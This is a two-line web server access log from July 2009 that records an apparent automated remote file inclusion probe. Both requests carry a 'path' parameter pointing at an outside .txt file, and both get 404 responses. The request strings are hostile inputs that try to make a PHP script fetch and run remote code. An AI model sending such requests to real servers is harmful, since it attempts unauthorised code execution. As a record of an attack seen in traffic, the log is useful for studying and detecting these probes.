74.53.70.114 - - [18/Jul/2009:02:05:23 -0400] "GET /logs/embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:05:23 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
